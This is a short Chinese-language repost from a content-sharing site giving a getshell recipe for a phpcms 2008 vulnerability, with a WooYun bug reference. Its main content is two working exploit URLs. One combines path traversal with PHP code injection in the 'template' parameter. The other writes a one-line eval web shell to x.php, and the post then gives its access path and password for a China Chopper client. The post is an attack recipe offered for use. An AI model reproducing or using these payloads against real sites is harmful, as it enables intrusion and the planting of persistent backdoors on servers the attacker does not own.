打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
phpcms 2008 getshell漏洞连接方法

关于phpcms 2008 getshell漏洞 拿shell

http://www.wooyun.org/bugs/wooyun-2010-09563

这个 注册企业会员 然后链接放exp info就出来了

EXP:http://localhost/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php phpinfo();exit();?>

不过呢 写一句话 shell 那样的话 用菜刀链接 就不行。。

这里找到一个好方法 就是。。写在目录下面。。包含一句话

localhost/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php fwrite(fopen(‘x.php’,'a’),’<?php @eval($_POST[m])?>’);exit();?>

链接方法: localhost/yp/business/x.php 密码 m

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
getshell学习总结( 压箱底,建议收藏)
1. 文件包含漏洞简介
ThinkPHP6.0任意文件创建Getshell复现
【收藏备用】思路决定“出路”,当我们拿到网站备份之后……
SeaCms6.4.5 远程代码执行漏洞复现
PHPCMSv9是怎么打开首页的
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服